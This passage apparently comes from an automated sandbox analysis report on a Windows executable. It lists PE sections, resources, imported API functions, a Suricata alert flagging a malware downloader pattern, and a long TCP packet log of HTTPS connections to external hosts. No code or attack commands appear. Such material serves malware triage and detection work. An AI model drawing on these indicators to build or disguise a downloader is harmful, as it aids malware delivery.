                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c30000x28340.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x94d800x1390.data
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x5e4a0x600030c42419b2e69d0fb178ad82fde5a6a6False0.6707356770833334data6.461674766148295IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x70000x12460x140043fab6a80651bd97af8f34ecf44cd8acFalse0.42734375data5.005029341587408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0x90000x3990380x400295703f29cbf0cc87537f54786ed1d01unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .ndata0x3a30000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x3c30000x283400x284000a923a42d1a39b5e7ff4cbf67045065cFalse0.21775524068322982data4.016272150271427IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0x3c33580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.1348337868212469
                                                      RT_ICON0x3d3b800x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.24942190456169855
                                                      RT_ICON0x3dd0280x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.286090573012939
                                                      RT_ICON0x3e24b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.2502952290977799
                                                      RT_ICON0x3e66d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3522821576763486
                                                      RT_ICON0x3e8c800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.37828330206378985
                                                      RT_ICON0x3e9d280x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4668032786885246
                                                      RT_ICON0x3ea6b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5106382978723404
                                                      RT_DIALOG0x3eab180x100dataEnglishUnited States0.5234375
                                                      RT_DIALOG0x3eac180x11cdataEnglishUnited States0.6056338028169014
                                                      RT_DIALOG0x3ead380xc4dataEnglishUnited States0.5918367346938775
                                                      RT_DIALOG0x3eae000x60dataEnglishUnited States0.7291666666666666
                                                      RT_GROUP_ICON0x3eae600x76dataEnglishUnited States0.7542372881355932
                                                      RT_VERSION0x3eaed80x128dataEnglishUnited States0.6114864864864865
                                                      RT_MANIFEST0x3eb0000x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                      Imports

                                                      DLLImport
                                                      KERNEL32.dllSetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                                      USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                                      ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishUnited States

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-07T19:25:58.193729+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.2049748142.250.80.46443TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 7, 2024 19:25:57.690480947 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:57.690502882 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:57.690741062 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:57.702403069 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:57.702414989 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:57.944232941 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:57.944416046 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:57.944416046 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:57.944436073 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:57.945194006 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:57.945492029 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:57.983562946 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:57.983577013 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:57.983830929 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:57.983946085 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:57.986164093 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:58.028218985 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:58.193730116 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:58.193844080 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:58.193993092 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:58.194077969 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:58.195379972 CEST49748443192.168.11.20142.250.80.46
                                                      Oct 7, 2024 19:25:58.195399046 CEST44349748142.250.80.46192.168.11.20
                                                      Oct 7, 2024 19:25:58.324503899 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:25:58.324544907 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:25:58.324748039 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:25:58.324935913 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:25:58.324959040 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:25:58.568646908 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:25:58.568969965 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:25:58.574865103 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:25:58.574875116 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:25:58.575098991 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:25:58.575258017 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:25:58.575728893 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:25:58.616215944 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.738996983 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.739201069 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.755284071 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.755558968 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.763679028 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.763899088 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.771828890 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.771981955 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.771994114 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.772176981 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.852245092 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.852546930 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.852560043 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.852785110 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.856991053 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.857202053 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.857213974 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.857409954 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.864779949 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.864959955 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.864975929 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.865154982 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.872983932 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.873222113 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.874011040 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.874218941 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.881481886 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.881695032 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.881706953 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.881915092 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.889303923 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.889564991 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.889575958 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.889760971 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.897567987 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.897775888 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.897788048 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.897983074 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.905885935 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.906158924 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.906171083 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.906384945 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.913650036 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.913885117 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.913897038 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.914107084 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.921077967 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.921262980 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.921276093 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.921457052 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.928814888 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.929030895 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.929044008 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.929286003 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.936357021 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.936568022 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.936580896 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.936789036 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.944140911 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.944346905 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.947701931 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.947989941 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.948002100 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.948266983 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.965533018 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.965874910 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.965886116 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.966171026 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.968986034 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.969257116 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.969275951 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.969573021 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.975924969 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.976353884 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.976367950 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.976587057 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.981930971 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.982225895 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.982239008 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.982449055 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.988085032 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.988362074 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.988374949 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.988583088 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.994569063 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.994611025 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.994793892 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:00.994812012 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:00.994910955 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.000489950 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.000734091 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.000746012 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.000977039 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.006738901 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.007033110 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.007045984 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.007225990 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.012506962 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.012763023 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.013031960 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.013216972 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.018639088 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.018902063 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.018913984 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.019900084 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.024621964 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.025466919 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.025479078 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.025753975 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.030714035 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.030900002 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.033858061 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.034569979 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.034583092 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.034899950 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.040024996 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.040206909 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.040220022 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.040400982 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.046006918 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.046165943 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.046176910 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.046833038 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.051764965 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.052212954 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.052227020 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.052464962 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.057193995 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.057430983 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.057442904 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.057612896 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.062335014 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.062618971 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.062630892 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.062819958 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.067287922 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.067549944 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.067560911 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.067737103 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.072370052 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.072599888 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.072614908 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.072767973 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.077591896 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.077867985 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.077878952 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.078088045 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.082639933 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.082859993 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.082871914 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.083132982 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.087361097 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.087578058 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.087589979 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.087801933 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.092109919 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.092358112 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.092370987 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.092586040 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.095000982 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.095179081 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.096941948 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.097115993 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.097126007 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.097310066 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.099721909 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.099922895 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.099935055 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.100080967 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.103032112 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.103187084 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.103197098 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.103355885 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.105967045 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.106125116 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.106136084 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.106266975 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.108706951 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.108896017 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.108906031 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.109036922 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.111769915 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.112000942 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.112014055 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.112195969 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.114708900 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.114866972 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.115087032 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.115263939 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.118191957 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.118395090 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.118403912 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.118578911 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.120595932 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.120790958 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.120800972 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.120970964 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.123584032 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.123780012 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.123790979 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.123960972 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.126441002 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.126614094 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.126622915 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.126807928 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.129324913 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.129564047 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.129575014 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.129745007 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.132213116 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.132431030 CEST49749443192.168.11.20142.251.40.97
                                                      Oct 7, 2024 19:26:01.133564949 CEST44349749142.251.40.97192.168.11.20
                                                      Oct 7, 2024 19:26:01.133738041 CEST49749443192.168.11.20142.251.40.97
